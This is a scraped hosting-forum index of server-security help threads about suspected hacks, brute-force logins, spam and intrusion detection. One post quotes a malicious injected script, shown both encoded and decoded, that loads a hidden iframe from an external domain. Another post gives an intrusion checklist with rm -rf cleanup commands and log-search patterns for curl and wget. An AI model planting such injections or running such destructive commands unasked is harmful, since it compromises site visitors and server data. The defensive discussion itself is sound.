How To Auto Detect A Hack Local File

Dec 12, 2007

My server running centOS4 and cPAnel.

Can anyone let me know how to auto detect a hack local file ? eg: review cgi-telnet, c99sell ....

View 4 Replies


ADVERTISEMENT

To Prevent Local Hack

Nov 29, 2007

I try to enhance my server security and prevent local hack but it seem useless.

I tried to chmod home/user/public_html to 711; disable functions; enable php open_basedir.

I can stop some popular shell such as c99shell.php but server can be hacked local.

Anyway to prevent it completely?

View 5 Replies View Related

Command Line To Detect Account/file With Video/music

Feb 20, 2007

What command line do you use to detect account storing music/video?

What command line do you search for file that is greater than 1MB?

View 1 Replies View Related

Auto Mount File System

Mar 26, 2009

How do i enable auto mount file system in my system? I am using linux ver4

View 2 Replies View Related

Core.xxx File Auto Generated

Jul 24, 2007

files core.xxx are generated on one shared hosting account.my server is using CPanel 11 current. these files use almost free space left on the account. They can be deleted but next time they appear again.

View 3 Replies View Related

Plesk 12.x / Linux :: Downloading Backups To Local Computer - Save File In TAR Format?

Jul 27, 2014

If I try to download a plesk backup to my local machine it saves a file a few bytes in size in .xml.tar.html format

My other non plesk 12 machines correctly save the file in .tar format ....

View 11 Replies View Related

Do Exchange Auto-responders Reply To Auto-responders

Mar 30, 2009

I have an address that receives hundreds and hundreds of e-mails a day. It's an address people aren't supposed to use (basically noreply@mydomain.com), but people do. I'd like to stop being the guy that gets these and routes them as appropriate, but we can't just turn it off and cause a hard bounce, because that will bewilder too many people who don't get that replying to noreply@mydomain.com is a bad idea. (Our website sends out notifications to people. A lot of people reply for various strange reasons, and we also get a lot of autoresponders sending us junk.)

I'm a Linux admin, so I'm a bit out of my league -- this needs to be configured on our Exchange box.

What I'd really like is an auto-responder for this address that will tell people that they e-mailed a mailbox that no one uses, and give them directions on how to contact a real person if need be.

However, fully half of the e-mails we receive are people's auto-responders. Is an Exchange auto-responder going to reply to their auto-responder? This will completely bewilder people.

And if this will auto-respond to auto-responders, is there a cleaner solution here? Again, it's got to be Exchange, but I'm a Postfix guy, so I have very little experience here.

View 5 Replies View Related

Hack

Sep 26, 2007

recently i found that a javascript code is appended to my index.aspx file on the server !

here is the code :

Code:
<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%

69%66%72%61%6d%65%20%6e%61%6d%65%3d%37%34%39%61%30%36%30%34%33%61%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%61%6c%6c%74%72%61%66%66%2e%72%75%2f%6c%6f%6c%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%

6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%33%31%30%38%34%29%2b%27%35%32%30%62%33%36%35%30%33%5c%27%20%77%69%64%74%68%3d%37%

36%20%68%65%69%67%68%74%3d%34%30%39%20%73%74%79%6c%65%3d%5c%27%64%
69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%

65%3e%27%29")); </script>
and this is the decoded one :

Code:
window.status='Done';document.write('<iframe name=749a06043a src='http://alltraff.ru/lol.php?'+Math.round(Math.random()*31084)+'520b36503' width=76 height=409 style='display: none'></iframe>')
i need to know 2 things :
1- is it possible that my developer did something wrong and hackers can append anything to his code ? . or it is a server issue and my host provider servers hacked !?
2- does anybody know anything about this piece of code ? (i dont mean it's action , i want to know ! is it known ?)

View 9 Replies View Related

Are They Going To Hack Me

Oct 27, 2007

When I check statistics for my site, I got this link: [url]

When I click on this site, it run very strange. Are they going to hack me or what they want to do with my site by using the scripts on their site?

after checking this: [url]

View 3 Replies View Related

Possible Hack

Oct 3, 2007

I have searched and searched but can't find anything related here, on Cpanel.net or through google.

I have a Linux/Cpanel machine. Hosts about 15-20 websites. No matter which site you try to visit it is redirected to some malware site or something that tries to get you download a program (Clearly a virus or trojan).

I cannot find any info on this or how to even stop the redirects.

View 14 Replies View Related

Someone From The Planet Trying To Hack In

Jun 11, 2008

My firewalls block IP's from multiple failed login attempts. The FW on one server has been blocking someone from The Planet. My servers are at GNAX, so why is someone from TP trying to get in?

This is what the system emails tell me:

IP: 70.87.XX.X (2.27.XXXX.static.theplanet.com)
Failures: 5 (sshd)
Interval: 95 seconds
Blocked: Yes

View 4 Replies View Related

Hack Attempt

Jan 31, 2007

I have started seeing the following error in the Event Viewer every day:

"An anonymous session connected from xxx.xxx.xxx.xxx has attempted to open an LSA policy handle on this machine. The attempt was rejected with STATUS_ACCESS_DENIED to prevent leaking security sensitive information to the anonymous caller. The application that made this attempt needs to be fixed. Please contact the application vendor. As a temporary workaround, this security measure can be disabled by setting the HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsaTurnOffAnonymousBlock DWORD value to 1. This message will be logged at most once a day."

The IP address is different every time. It is not an internal IP address or any I recognize. It is from the outside. I have read about this in the Microsoft site but it only mentioned how it might be an internal service/application attempting the access. This is not my case since I am seeing remote IP addresses. Anyone can help me dig deeper into this? How can I find out more about what's going on?

View 3 Replies View Related

How Do I Un-hack My Site

Sep 5, 2007

I haven't really delved into it yet but my wife and I have a personal website with pictures and what-not which was hacked by some Saudi Arabian hacker

site is www.nickandkathi.com

I dont' have the index files with me but is all Ineed to do just re-load my index page on my PC to my file? I'm hosted with hostgator.

How do I stop this from happening again?

View 5 Replies View Related

Someone Try To Hack My Password

May 29, 2007

May 28 16:23:06 server sshd(pam_unix)[13017]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.56.106.248 user=root

I got so many of this line in my server log.

First of all, where is the server log located anyway? I got this from SIM.

May 28 16:23:09 server sshd(pam_unix)[13037]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.56.106.248 user=root May 28 16:23:11 server sshd(pam_unix)[13045]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.56.106.248 user=root May 28 16:23:11 server sshd(pam_unix)[13061]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.56.106.248 user=root May 28 16:23:13 server sshd(pam_unix)[13066]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.56.106.248 user=root May 28 16:23:13 server sshd(pam_unix)[13067]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.56.106.248 user=root May 28 16:23:13 server sshd(pam_unix)[13071]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.56.106.248 user=root May 28 17:00:02 server ntpdate[19626]: adjust time server 192.5.41.40 offset 0.343837 sec May 28 18:00:07 server ntpdate[28711]: adjust time server 192.5.41.40 offset 0.344493 sec May 28 19:00:06 server ntpdate[3218]: adjust time server 192.5.41.40 offset 0.342326 sec May 28 20:00:02 server ntpdate[8283]: adjust time server 192.5.41.40 offset 0.341603 sec May 28 21:00:07 server ntpdate[13899]: adjust time server 192.5.41.40 offset 0.343715 sec May 28 21:37:45 server sshd(pam_unix)[17268]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=217.156.110.24 user=root May 28 21:37:45 server sshd(pam_unix)[17271]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=217.156.110.24 user=root May 28 21:37:45 server sshd(pam_unix)[17270]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=217.156.110.24 user=root May 28 21:37:45 server sshd(pam_unix)[17254]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=217.156.110.24 user=root

View 13 Replies View Related

How To Detect Spamming

Apr 21, 2009

How do you know your clients are sending bulk/spam emails?

I don't seem to understand the reports in "Email >> View Mail Statistics" section of WHM.

View 5 Replies View Related

Detect Memory

Jul 25, 2009

I have a private vps server works under linux ( centos ), sometimes am getting msg from csf/firewall subject:

lfd on website.com: Suspicious process running under user user account

when i check my cpanel/whm vps ( service status ) its shows that the memory limit 80% - 85% , It's had a good forum works with vb, but am wonder how to check my vps memory, i mean how to detect if there any script, or malware, or anything takes the vps memory out...

Is there any way to check,know what works under my vps, so it's take my memory limit 85%?

i check the tmp folder,

root@www [/home]# cd /tmp
root@www [/tmp]# ls -la
total 364
drwxrwxrwt 6 root root 4096 Jul 25 02:14 ./
drwxr-xr-x 21 root root 4096 Jul 18 02:21 ../
drwxrwxrwt 2 root root 4096 Jun 30 05:50 .ICE-unix/
drwxrwxrwx 18 root root 4096 Jul 2 17:33 eaccelerator/
lrwxrwxrwx 1 root root 27 Jul 18 02:13 mysql.sock -> ../var/lib/mysql/mysql.sock=
drwxr-xr-x 3 root root 4096 Jun 30 05:29 pear/
drwx------ 3 root root 4096 Jul 5 18:31 spamd-23647-init/
-rw------- 1 root root 343335 Jul 19 02:50 whatis.bk6140
root@www [/tmp]# cd /home
and the df space

root@www [~]# df -h
Filesystem Size Used Avail Use% Mounted on
/dev/simfs 80G 4.1G 76G 6% /
root@www [~]#
and the services running is

USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 2060 156 ? Ss Jun30 1:23 init [3]
root 7465 0.0 0.0 2444 156 ? S Jul03 0:00 /bin/sh /usr/bin/mysqld_safe --datadir=/var/lib/mysql --pid-file=/var/lib/mysql/www.website.com.pid
mysql 7491 0.0 2.5 33452 10440 ? Sl Jul03 11:33 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/www.website.com.pid --skip-external-locking
root 10236 0.0 6.0 27396 24764 ? Ss Jul24 0:07 /usr/bin/spamd -d --allowed-ips=127.0.0.1 --pidfile=/var/run/spamd.pid --max-children=3 --max-spare=1
root 11447 0.0 1.9 18364 8020 ? S Jul24 0:00 cpsrvd - waiting for connections
root 11865 0.0 0.7 13672 3260 ? S Jul06 0:00 /usr/local/apache/bin/httpd -k start -DSSL
root 13537 0.0 3.1 15092 13064 ? Ss 00:00 0:02 lfd - sleeping
root 13703 0.0 0.3 3808 1284 ? SN Jul06 0:01 cpanellogd - sleeping for logs
root 13739 0.0 0.6 5856 2844 ? Ss Jul06 0:00 cPhulkd - processor
root 13795 0.0 1.5 14760 6304 ? S Jul06 0:00 cpdavd - accepting connections on 2077 and 2078
root 18161 0.0 0.0 1716 380 ? Ss Jun30 0:24 syslogd -m 0
root 18164 0.0 0.0 1668 72 ? Ss Jun30 0:00 klogd -x
dbus 18193 0.0 0.0 2736 212 ? Ss Jun30 0:00 dbus-daemon --system
root 18213 0.0 0.0 2716 172 ? Ss Jun30 0:00 xinetd -stayalive -pidfile /var/run/xinetd.pid
root 18399 0.0 5.9 27604 24404 ? S Jul24 0:06 spamd child
root 19461 0.0 0.1 3228 684 ? Ss Jun30 0:08 crond
root 19616 0.0 0.0 1820 124 ? Ss Jun30 0:00 /usr/sbin/portsentry -

View 7 Replies View Related

How To Detect Flood Ftp

May 4, 2008

My server run after 10h sevices ftp is down (network error: connection timed out). may be flood ftp.

how to Detect flood ftp.

View 4 Replies View Related

How-to Detect A Possible Intruder ¿?

May 22, 2007

I have a few incomplete steps to see if I got some intruder in my Linux system.. But i really would like to have all your suggestions to make a good doc about this matter,

1.- Download and run Rkhunter & Chkrootkit
2.- Run "w", and "netstat -nalp |grep "SHPORTHERE" to see whos connected using SSH
3.- Search for ssh and ftp accepted logins.

Code:
last
cat /var/log/secure* | grep ssh | grep Accept
cat /var/log/secure* |grep ftp |grep Accept
less /var/log/messages | grep ftp
4.- Watch current connections and scan your ports.

Code:
netstat -nalp
nmap 1-65535 localhost
5.- Search for suspicious content on common explotable dirs.

Code:
rm -rf /tmp/sess*
rm -rf /var/dos-*
rm -rf /var/tmp/ssh-*
rm -rf /var/tmp/dos-*
ls /tmp -lab
ls /var/tmp -labR
ls /dev/shm -labR
ls /usr/local/apache/proxy -labR
ls /usr/local/samba -labR
6.- Checking for anomalies on this files.

Code:
less /etc/passwd
less /etc/shadow
less /etc/groups
7.- Search for new users at sudoers, check wtmp and telnet is not running.

Code:
cat /etc/sudoers
who /var/log/wtmp
cat /etc/xinetd.d/telnet
8.- Find bash history files

Code:
find '/' -iname .bash_history
9 .- Verify the Crontab table

Code:
crontab -l
10 .- Update the slocate database and search for exploits.

Code:
updatedb &
For cPanel servers:

Code:
egrep -i '(chr(|system()|(curl|wget|chmod|gcc|perl)%20' /usr/local/apache/logs/*
egrep -i '(chr(|system()|(curl|wget|chmod|gcc|perl)%20' /home/*/statistics/logs/*
For Ensim servers:

Code:
egrep -i '(chr(|system()|(curl|wget|chmod|gcc|perl)%20'/home/virtual/site*/fst/var/log/httpd/*
Search for shell code:

Code:
cat /path/of/your/web/logs/* |grep "/x90/"
11.- Search for hidden dirs

Code:
locate "..."
locate ".. "
rlocate " .."
locate ". "
locate " ."
12.- Search for perl-scripts running

Code:
ps -aux | grep perl
13 .- Checking nobody user and open files.

Code:
service httpd stop
lsof -u nobody

View 14 Replies View Related

Client Threatning To Hack

Apr 9, 2009

I just had a client whose hosting account was automatically suspended due to him not paying the hosting bill. He opened up a ticket and asked why his site is suspended. I informed him that he didn't pay the bill and the system suspended it automatically. I told him that the system generated e-mails as well and he said he didn't get them while I looked in WHCMS, it said it DID get sent to him. Client said his website was DDOS'd because it used 3 GB of BW in one month and i told him there was no DDOS attack. The kind of site he had (100+ users online at one time, vBulletin forum), it was common to use that much.

The client is now saying that he is going to hack attempt the servers to see if they are DDOS Protected or not. Of Course, my servers are protected (WiredTree), so should I be worried?

His quote:

Quote:

I'LL TEST TO SEE IF YOU HAVE DDOS PROTECTION...TIME TO GATHER MY HACKING BUDDYS.

Also, I have notified WiredTree about this just right now.

View 14 Replies View Related

Possible Root Level Hack

Apr 28, 2009

I believe my server has been hacked as I did the top and observe as follows

top - 15:53:39 up 12 days, 3:16, 2 users, load average: 7.87, 10.30, 11.10
Tasks: 789 total, 3 running, 771 sleeping, 0 stopped, 15 zombie
Cpu(s): 20.4% us, 9.3% sy, 4.8% ni, 35.0% id, 30.1% wa, 0.4% hi, 0.0% si
Mem: 2074364k total, 2048296k used, 26068k free, 72136k buffers
Swap: 2040244k total, 2076k used, 2038168k free, 1286884k cached

PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
22488 root 27 12 3376 1352 508 R 16.8 0.1 12:08.63 rsync
15370 named 20 0 84020 30m 1936 S 4.2 1.5 20:15.72 named
16732 root 16 0 4684 1456 868 S 2.9 0.1 0:01.07 ftp
22489 root 27 12 5444 1860 1420 R 2.9 0.1 3:27.51 ssh
26448 mailnull 17 0 9016 4088 2832 D 2.9 0.2 0:00.11 exim
26436 mailnull 16 0 0 0 0 Z 2.4 0.0 0:00.09 exim <defunct>
477 root 15 0 0 0 0 D 2.1 0.0 217:34.28 kjournald
26408 mailnull 16 0 8964 4584 3244 D 2.1 0.2 0:00.08 exim
26442 mailnull 16 0 0 0 0 Z 2.1 0.0 0:00.08 exim <defunct>
16975 root 15 0 4684 1444 856 S 1.6 0.1 0:00.56 ftp
23071 root 16 0 3760 1420 764 R 1.6 0.1 0:05.08 top
26477 root 16 0 8616 3892 2656 D 1.6 0.2 0:00.06 exim
26486 root 15 0 9420 3888 2656 D 1.3 0.2 0:00.05 exim
16694 root 15 0 4684 1436 848 S 1.0 0.1 0:00.63 ftp
16840 root 15 0 4684 1448 860 S 1.0 0.1 0:00.43 ftp
16865 root 15 0 4684 1444 856 S 1.0 0.1 0:00.72 ftp
16932 root 15 0 4684 1444 856 S 1.0 0.1 0:00.42 ftp
17275 root 15 0 4684 1448 860 S 1.0 0.1 0:00.57 ftp
26434 mailnull 16 0 8972 3956 2704 D 1.0 0.2 0:00.04 exim
26437 mailnull 15 0 8964 3920 2688 D 1.0 0.2 0:00.04 exim
26451 mailnull 15 0 8968 3932 2696 S 1.0 0.2 0:00.04 exim
26489 root 18 0 10568 3912 2656 S 1.0 0.2 0:00.04 exim
5310 root 15 0 40104 35m 1888 S 0.8 1.8 10:55.77 tailwatchd
16771 root 15 0 4684 1448 860 S 0.8 0.1 0:00.44 ftp
16779 root 15 0 4684 1448 860 S 0.8 0.1 0:00.56 ftp
16806 root 16 0 4684 1444 856 S 0.8 0.1 0:00.71 ftp
16844 root 15 0 4684 1440 852 S 0.8 0.1 0:00.57 ftp
16854 root 15 0 4684 1444 856 S 0.8 0.1 0:00.72 ftp
16857 root 15 0 4684 1444 856 S 0.8 0.1 0:00.63 ftp
16868 root 15 0 4684 1448 860 S 0.8 0.1 0:00.79 ftp
16885 root 15 0 4684 1448 860 S 0.8 0.1 0:00.68 ftp
16982 root 15 0 4684 1440 852 S 0.8 0.1 0:00.40 ftp
17008 root 16 0 4684 1448 860 S 0.8 0.1 0:00.69 ftp
17038 root 15 0 4684 1448 860 S 0.8 0.1 0:01.01 ftp
17082 root 15 0 4684 1448 860 S 0.8 0.1 0:00.71 ftp
17106 root 15 0 4684 1444 856 S 0.8 0.1 0:00.84 ftp
17288 root 16 0 4684 1448 860 S 0.8 0.1 0:00.69 ftp

Now..I am logged in root in two terminals and it shows

root pts/2 Apr 28 15:19 (x.x.x.x)
root pts/3 Apr 28 14:06 (x.x.x.x)

I am just wondering how can the root perform ftp tasks where my root login is sitting idle and what about pts/0 and pts/1

I stopped the ftp service in cpanel and it is started automatically..

View 14 Replies View Related

Hack Erases 100,000 Websites

Jun 9, 2009

Don't know if anyone else saw this.

[url]

Once again points out the importance of backups.

View 5 Replies View Related

What's Your Take On This Email Hack Scenario

Feb 26, 2008

I'm not a server admin, but help my client with basic it tasks...we built their website for them and just sort of fell into helping them out when they need it. My client has a vps with knownhost, the vps is only used for hosting the email for their domain, the website is hosted on another server. 4 days ago, I logged in and checked the mail queue and found thousands of emails in the queue that were phishing emails trying to get passwords from the recipients for a service called moneybookers.com. According to knownhost, the hacker had guessed the password of one of the email accounts and had started sending mail through it. The hacked account was deleted that day as it was a test account and was not needed anyways. As soon as the account was deleted, the phishing mails stopped being sent. Knownhost reassured us the server hadn't been breached, but we changed the root password anyways. Around 15k to 20k emails were sent in a 14 hour period. Since that time we have appeared on a few blacklsts and have a negative senderbase score and so any company that uses senderbase is obviously rejecting our mail... My client has just hired assuretymail services to get accredited and has invested a lot of money into streamlining mail delivery, so this is obviously devastating to them.

Today I logged in and again found 1000's of email in queue, yet again, and this time they were paypal phishing emails. I immediately changed the passwords of all 50 of the email accounts, including the root. It looks like around 14k or so emails were sent.

Trying to understand how this could happen yet again, knownhost is saying that, yet again the account "test", the same account used last time was used for sending out emails. I was confused by how a previously deleted account could be used to again begin sending emails even though it was deleted 4 days ago. According to knownhost "[FONT='Verdana','sans-serif']The only reasonable explanation for this activity would be that exim cached credentials for system user "test" and didn't refresh its internal cache since the moment when "test" account was removed. To force exim to refresh the cache exim mail server was restarted on your system, so it shouldn't be possible to use that (non-existent) account again to relay the mail through your system."[/FONT]

[FONT='Verdana','sans-serif'][/FONT]
[FONT='Verdana','sans-serif']Being that I'm not a server admin and I rely on knownhost for server admin basics, am I out of line thinking that knownhost dropped the ball here? I mean is it obvious that a restart was in order after the first hack or is this just a bad chance scenario. Is the scenario they are describing plausible?[/FONT]

View 1 Replies View Related

Secure VPS After Many Hack Attacks

Feb 2, 2008

my VPS provider just rebuilt my VPS after many hack attacks.

From some days I am getting emails from firewall that someone login to my VPS/mySQL using SSH.

I don't know what they do, but they don't disturb any account. Only some downtime feel during this. But last night my VPS stop working so my provider rebuilt VPS.

how I can secure my VPS now. I have Cpanel installed.

View 7 Replies View Related

Physical Hack Of My Server

Dec 9, 2007

Physical hack of my server?

My server (cent OS4, plesk 8) was frozen for a day and the NOC had to reboot it, here is the mail I got from my host:

>Your server was frozen, with a kernel panic. Ensure that you check your logs closely to determine how this happened,

After looking at the message log here is the part of the log when the crash happened:
Is this really a kernel panic, I am not sure...

Dec 8 09:05:36 server kernel: input: AT Translated Set 2 keyboard on isa0060/serio0
Dec 8 09:05:37 server hal.hotplug[2701]: DEVPATH is not set
Dec 8 09:05:37 server hal.hotplug[2702]: DEVPATH is not set
Dec 8 09:05:42 server login(pam_unix)[2670]: bad username [ ]
Dec 8 09:05:42 server login[2670]: Authentication started for user
Dec 8 09:05:44 server login[2670]: FAILED LOGIN 1 FROM (null) FOR , Authentication failure
Dec 8 09:05:50 server login(pam_unix)[2670]: authentication failure; logname=LOGIN uid=0 euid=0 tty=tty1 ruser= rhost= user=root
Dec 8 09:05:50 server login[2670]: Authentication started for user root
Dec 8 09:05:53 server login[2670]: FAILED LOGIN 2 FROM (null) FOR root, Authentication failure
Dec 8 09:05:57 server login(pam_unix)[2671]: authentication failure; logname=LOGIN uid=0 euid=0 tty=tty2 ruser= rhost= user=root
Dec 8 09:05:57 server login[2671]: Authentication started for user root
Dec 8 09:05:59 server login[2671]: FAILED LOGIN 1 FROM (null) FOR root, Authentication failure
Dec 8 09:06:00 server shutdown: shutting down for system reboot
Dec 8 09:06:00 server init: Switching to runlevel: 6
^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@
Dec 9 05:52:36 server syslogd 1.4.1: restart.

It looks to me like if someone has physically connected a keyboard and logged in at the NOC.

I use Iptable to restrict ssh access to my IP each time I connect remotly, so I dont' think a remote connection has been possible.

any idea about this line:
^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@
I think it's just corupted data the was written when the server shutt down.

Also i didn't find any other signes of kernel panic in the logs

Looking at the httpd error log I found this lines before the crash:

[Sat Dec 08 00:44:40 2007] [error] [client 213.215.41.138] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind
[Sat Dec 08 00:44:40 2007] [error] [client 213.215.41.138] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind

apparently somone doing server scan. maybe the 2 events are correlated and the server freeze could have been a result of some buffer overflow attack, but i sould be finding some evidences of this on the apache logs?

What direction should I take to investigate a bit further on this server freeze?

View 3 Replies View Related

Figuring This Hack Attack Out

Feb 13, 2007

My company website URL is something along these lines: (I won't give the full URL because I guess that would be classed as advertising.)

www dot olapXXXXXX dot com

Now, we've discovered today that there are links on the site that look like this:

www dot olapXXXXXXdotcom/pornsex.dhtml

These links and pages have not been created by us. The link foes to a page advertising various porn, poker, viagra sites etc.

I've checked the FTP and the pages do not seem to be on the server.

So I'm a little bemused and stuck! How did someone piggyback on our site in this way?

The pages are indexed in Google so if you do a search for our company name and 'strip poker' then the link shows up in Google.

Does anyone have any idea what's going on? We own the URL, we don't believed our password has been compromised, the domain has not expired.

I think perhaps it's something to do with DHTML? We don't use it but all the bad pages do.

The links are not accessible from any of our pages (as for as I can see) but it's still a problem because they show up in Google.

View 1 Replies View Related

Notifying DC Of Hack Attempt

May 30, 2007

Usually I just block offending machines that try to get into our systems and move on but for the last 2 days I have started notifying the contacts on the arin info for offending IP's. I guess I am trying to do my part to make the internet a better place?

Is this stuff largely ignored?

Is anyone else doing this?

Is there an easier way?

View 14 Replies View Related

Hack Attempt? I'm Pretty Sure...

Jul 8, 2007

A new client has just opened up an account and the first thing hes installed at a few scripts called r57shell and c99shell. I'm not very familiar with these two scripts, but by the looks of them their root kits of some sort. Amd I correct in thinking this?

The account has been susspended for the time being.

View 12 Replies View Related

CPU Quota Hack Program

Nov 21, 2007

A hack program (i do not know what its name is) cause following error via vBulletin or any forum

Code:
This Account Has Exceeded Its CPU Quota
i do not know how i can find out accesing ip and block access request

and

i do not know its runining system ?

i m in shared host (have SSH account)

View 14 Replies View Related

Detect Errors On Server

Apr 6, 2009

I have a server of my own. Unfortunatlly 20% of the time, the server is down even though my connection to internet always up.

I am checking the event log but cannot see anything odd...
OS:Windows server 2003

Is there any tool to detect why the server is down most of the time?

I can post the event viewer errors that I can find suspeicious if needed.

View 2 Replies View Related

How To Detect A DDoS Attack ...

May 19, 2009

is there any proved method to determine what kind of attack you are under? Our server has been under attack for more than a day now but so far we have not been able to find out what kind of attack it is exactly. The server maintence company we are using says it's a DDoS attack but they don't say how they found this out. Also, they are not telling us what kind of DDoS attack it is.

View 14 Replies View Related







Copyrights 2005-15 www.BigResource.com, All rights reserved